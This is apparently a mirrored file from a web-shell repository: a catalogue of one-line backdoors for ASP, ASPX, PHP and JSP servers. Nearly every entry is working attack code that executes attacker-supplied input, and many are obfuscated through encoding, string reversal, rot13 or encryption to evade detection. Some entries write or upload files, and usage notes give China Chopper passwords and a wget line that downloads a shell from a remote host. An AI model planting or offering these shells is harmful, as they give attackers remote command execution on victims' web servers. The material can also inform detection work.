mirror of
https://github.com/tennc/webshell
synced 2024-11-13 23:17:10 +00:00
245 lines
11 KiB
Text
245 lines
11 KiB
Text
|
======================================================
|
|||
|
|| ASP一句话 ||
|
|||
|
======================================================
|
|||
|
----------------------------------------
|
|||
|
<%
|
|||
|
<!-- caidao setting input:<O>sb=eval(request(0))</O>,connecting pass:0 -->
|
|||
|
re= request("sb")
|
|||
|
if re <>"" then
|
|||
|
execute re
|
|||
|
response.end
|
|||
|
end if
|
|||
|
%>
|
|||
|
----------------------------------------
|
|||
|
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
|
|||
|
----------------------------------------
|
|||
|
<%
|
|||
|
codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
|
|||
|
execute (decode (codeds) )
|
|||
|
Function DeCode (Coded)
|
|||
|
On Error Resume Next
|
|||
|
For i = 1 To Len (Coded)
|
|||
|
Curchar = Mid (Coded, i, 1)
|
|||
|
If Asc (Curchar) = 16 then
|
|||
|
Curchar = chr (8)
|
|||
|
Elseif Asc (Curchar) = 24 then
|
|||
|
Curchar = chr (12)
|
|||
|
Elseif Asc (Curchar) = 32 then
|
|||
|
Curchar = chr (18)
|
|||
|
Else
|
|||
|
Curchar = chr (Asc (Curchar) -3)
|
|||
|
End if
|
|||
|
DeCode = Decode&Curchar
|
|||
|
Next
|
|||
|
End Function
|
|||
|
'response.write(decode(codeds))
|
|||
|
' 菜刀连接 /hkmjj.asp?xx=x ,密码 hkmjj
|
|||
|
%>
|
|||
|
----------------------------------------
|
|||
|
<%
|
|||
|
dim x1,x2
|
|||
|
x1 = request("pass")
|
|||
|
x2 = x1
|
|||
|
eval x2
|
|||
|
%>
|
|||
|
----------------------------------------
|
|||
|
<%
|
|||
|
Function MorfiCoder(Code)
|
|||
|
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
|
|||
|
End Function
|
|||
|
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
|
|||
|
%>
|
|||
|
Password: z
|
|||
|
----------------------------------------
|
|||
|
<%a=request("cmd")%><%eval a%>
|
|||
|
----------------------------------------
|
|||
|
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>
|
|||
|
----------------------------------------
|
|||
|
<%execute(request("xiaoma"))%>
|
|||
|
----------------------------------------
|
|||
|
1":eval request("a")'
|
|||
|
----------------------------------------
|
|||
|
"%><%eval request("a")%><%'"
|
|||
|
----------------------------------------
|
|||
|
<%Y=request("x")%> <%execute(Y)%>
|
|||
|
----------------------------------------
|
|||
|
<%eval request("xiaoma")%>
|
|||
|
----------------------------------------
|
|||
|
┼癥污爠煥敵瑳∨≡┩愾 password: a
|
|||
|
----------------------------------------
|
|||
|
======================================================
|
|||
|
|| ASPX一句话 ||
|
|||
|
======================================================
|
|||
|
----------------------------------------
|
|||
|
<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
|
|||
|
----------------------------------------
|
|||
|
<% @Page Language="Jscript"%><%eval(Request.Item["hucxsz"],"unsafe");%>
|
|||
|
----------------------------------------
|
|||
|
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
|
|||
|
----------------------------------------
|
|||
|
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
|
|||
|
----------------------------------------
|
|||
|
<script type="text/javascript" language="C#">// <![CDATA[
|
|||
|
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); // ]]></script>
|
|||
|
Password: webadmin
|
|||
|
----------------------------------------
|
|||
|
<script runat="server" language="JScript">
|
|||
|
function popup(str) {
|
|||
|
var q = "u";
|
|||
|
var w = "afe";
|
|||
|
var a = q + "ns" + w;
|
|||
|
var b= eval(str,a);
|
|||
|
return(b);
|
|||
|
}
|
|||
|
</script>
|
|||
|
----------------------------------------
|
|||
|
<%
|
|||
|
popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));
|
|||
|
%>
|
|||
|
Password: z
|
|||
|
----------------------------------------
|
|||
|
<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["xiaoma"],"unsafe"));%>
|
|||
|
----------------------------------------
|
|||
|
<%@ Page Language="C#" ValidateRequest="false" %>
|
|||
|
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["f4ck"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
|
|||
|
======================================================
|
|||
|
|| PHP一句话 ||
|
|||
|
======================================================
|
|||
|
----------------------------------------
|
|||
|
?JFIF
|
|||
|
<?php @eval($_POST['caidao']);?>
|
|||
|
----------------------------------------
|
|||
|
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
|
|||
|
----------------------------------------
|
|||
|
<?php @preg_replace("//e",$_POST[x],"e");exit("|LO|"); ?>
|
|||
|
----------------------------------------
|
|||
|
<?php array_map("ass\x65rt",(array)$_REQUEST['test']);?>
|
|||
|
----------------------------------------
|
|||
|
<?php $item['wind'] = 'assert';$array[] = $item;$array[0]['wind']($_POST['whirlwind']);?>
|
|||
|
----------------------------------------
|
|||
|
<?php if(isset($_POST["f4ck"])){$a=strrev("edoced_46esab");eval($a($_POST[z0]));}?>
|
|||
|
----------------------------------------
|
|||
|
<?php if(md5($_GET['pass'])=='21232f297a57a5a743894a0e4a801fc3'){eval($_POST[console]);}else{die('fuck off!');}?>
|
|||
|
----------------------------------------
|
|||
|
<?php
|
|||
|
//Password: $ws->Run
|
|||
|
eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA==')));
|
|||
|
?>
|
|||
|
----------------------------------------
|
|||
|
<?php
|
|||
|
$fatezero = "SABERBERSERKER(\$LANCERPCASTEROSTCASTERARCHERCASTER'faCASTERtASSASSINzCASTERASSASSINCASTERro'RIDER)GINTAMA";
|
|||
|
$fatestaynight = str_replace("CASTER", "", $fatezero);
|
|||
|
$fatezero = str_replace("LANCER", "_", $fatestaynight);
|
|||
|
$fatestaynight = str_replace("SABER", "ev", $fatezero);
|
|||
|
$fatezero = str_replace("BERSERKER", "al", $fatestaynight);
|
|||
|
$fatestaynight = str_replace("RIDER", "]", $fatezero);
|
|||
|
$fatezero = str_replace("GINTAMA", ";", $fatestaynight);
|
|||
|
$fatestaynight = str_replace("ARCHER", "[", $fatezero);
|
|||
|
$fatezero = str_replace("ASSASSIN", "e", $fatestaynight);
|
|||
|
|
|||
|
if($fatestaynight !== $fatezero)
|
|||
|
{
|
|||
|
eval($fatezero);//fatezero
|
|||
|
}
|
|||
|
?>
|
|||
|
----------------------------------------
|
|||
|
<?php
|
|||
|
//http://test.com/get_write.php?a=/shell.php&b=3C3F70687020406576616C28245F504F53545B2763616964616F275D293B3F3E
|
|||
|
//caidao connecting http://test.com/shell.php pass:caidao
|
|||
|
$p=realpath(dirname(__FILE__)."/").$_GET["a"];
|
|||
|
$t=$_GET["b"];
|
|||
|
$tt="";
|
|||
|
for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode("%".substr($t,$i,2));
|
|||
|
@fwrite(fopen($p,"w"),$tt);
|
|||
|
echo "success!";
|
|||
|
var_dump($p,$tt);
|
|||
|
?>
|
|||
|
----------------------------------------
|
|||
|
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['k8']);?>
|
|||
|
----------------------------------------
|
|||
|
<?php $mujj = $_POST['z'];if ($mujj!=""){$xsser=base64_decode($_POST['z0']);@eval("\$safedg = $xsser;");}?>
|
|||
|
----------------------------------------
|
|||
|
<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
|
|||
|
----------------------------------------
|
|||
|
<?php preg_replace("/^/e",base64_decode($_REQUEST[g]),0);?>
|
|||
|
----------------------------------------
|
|||
|
<?php fputs(fopen("./shell.php","w"),"<?eval(\$_POST[a]);?>")?>
|
|||
|
----------------------------------------
|
|||
|
<?php if($_POST[admin]){assert($_POST[admin]);}else{phpinfo();}?>
|
|||
|
----------------------------------------
|
|||
|
<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)','add');?>
|
|||
|
----------------------------------------
|
|||
|
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
|
|||
|
caidao: http://site/1.php?2=assert Password: 1
|
|||
|
----------------------------------------
|
|||
|
<?php
|
|||
|
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
|
|||
|
$hh("/[discuz]/e",$_POST['h'],"Access");
|
|||
|
?>
|
|||
|
----------------------------------------
|
|||
|
<?php
|
|||
|
$user="63a9f0ea7bb98050796b649e85481845"; #root
|
|||
|
$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
|
|||
|
|
|||
|
if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
|
|||
|
{eval($_GET['idc']);}
|
|||
|
?>
|
|||
|
---------------------------------------
|
|||
|
<?php
|
|||
|
$func = new ReflectionFunction($_GET[m]);
|
|||
|
echo $func->invokeArgs(array($_GET[c],$_GET[id]));
|
|||
|
?>
|
|||
|
shell.php?m=file_put_contents&c=test.php&id=<?@eval($_POST[c]);?> //写入一句话马 for linux
|
|||
|
shell.php?m=file_put_contents&c=test.php&id=<?php eval($_POST[c]);?> //写入一句话马 for windows
|
|||
|
shell.php?m=system&c=echo ^<?php eval^($_POST[c]^);?^> >test.php //在当前目录下面生成一句话马 for windows
|
|||
|
shell.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test.php //当前目录下载一句话马 for linux
|
|||
|
----------------------------------------
|
|||
|
<?php assert($_POST[sb]);?>
|
|||
|
----------------------------------------
|
|||
|
<script language="php">@eval($_POST[sb])</script>
|
|||
|
caidao: <O>h=@eval($_POST1);</O> Password: sb
|
|||
|
----------------------------------------
|
|||
|
<?php eval($_POST[xiaoma]);?>
|
|||
|
----------------------------------------
|
|||
|
<?php $_GET['ts7']($_POST['cmd']);?>
|
|||
|
//caidao: http://www.target.com/shell.php?ts7=assert
|
|||
|
----------------------------------------
|
|||
|
<?php
|
|||
|
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
|
|||
|
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
|
|||
|
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
|
|||
|
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); // Password: -7
|
|||
|
?>
|
|||
|
----------------------------------------
|
|||
|
<?fputs(fopen("test.php","w"),'<?php eval($_POST["cmd"]);?>');?>
|
|||
|
----------------------------------------
|
|||
|
<?php
|
|||
|
error_reporting(0);
|
|||
|
set_time_limit(0);
|
|||
|
function decrypt($ciphertext_hex,$key){
|
|||
|
$key=md5($key);
|
|||
|
$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
|
|||
|
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
|
|||
|
$ciphertext_dec = pack("H*",$ciphertext_hex);
|
|||
|
$iv_dec = substr($ciphertext_dec, 0, $iv_size);
|
|||
|
$ciphertext_dec = substr($ciphertext_dec, $iv_size);
|
|||
|
$plaintext_dec = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key,$ciphertext_dec, MCRYPT_MODE_CBC, $iv_dec);
|
|||
|
return trim($plaintext_dec);
|
|||
|
}
|
|||
|
if(@$_REQUEST['key']){
|
|||
|
$key=$_REQUEST['key'];
|
|||
|
$hash='bd40dd58f44adc5c334e53418ea1bcd591521d60662c6753b89dc46bb02b1ecb02bf857eaa0ea5d5a36ecf638d65c55eb9a8f2b17ceb2d740e3eba7792d3995b7d4fdbdf9f5f90b219cf955539b169a40109ff496262cbc21050e6993d1f9a6a678990e0b01a03617dd4b38358d78e9a67eabe8b288487a96ca55a94e8d6614a';
|
|||
|
$shellcode='12ec445a8c4be78007d08367455c60d571c3509ba62d1f2b321fa824667345ff3131b02b81c8ad646ffc3360e60d19d3f7f43b7b21f5bca05d6e7abfc2461b5d72fffb22659aa08655cdd8734baa0fd47b93a5659348954f853d3a68022fb3422a3832efa04792c1a81680e5aa8081716f169e05afb332a26fbd0f76ae8905b9a068ddb54f3ae107ba673362835951f4953db1079b6a3c0b4eb20ca96a241936244947ee67e0d563d8b2eee439cc5ba21151ae520eec0a663f092f9845918c7d6630764dad77808e376e099008403b01c491399da5cb3c8926c29b1bf89e8c751fb33a850c608b20e4c41cf28ec8b8060a30a827b43cd301d9c587863ce39f2326345a0217110fc898acb6c3343f3ce8';
|
|||
|
eval(decrypt($hash,$key));
|
|||
|
}else{
|
|||
|
echo 'ERROR!';
|
|||
|
}
|
|||
|
//caidao: <0>key=90sec</0> or Url: http://www.target.com/90sec.php?key=90sec Password: shell
|
|||
|
----------------------------------------
|
|||
|
======================================================
|
|||
|
|| JSP一句话 ||
|
|||
|
======================================================
|
|||
|
----------------------------------------
|
|||
|
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
|
|||
|
----------------------------------------
|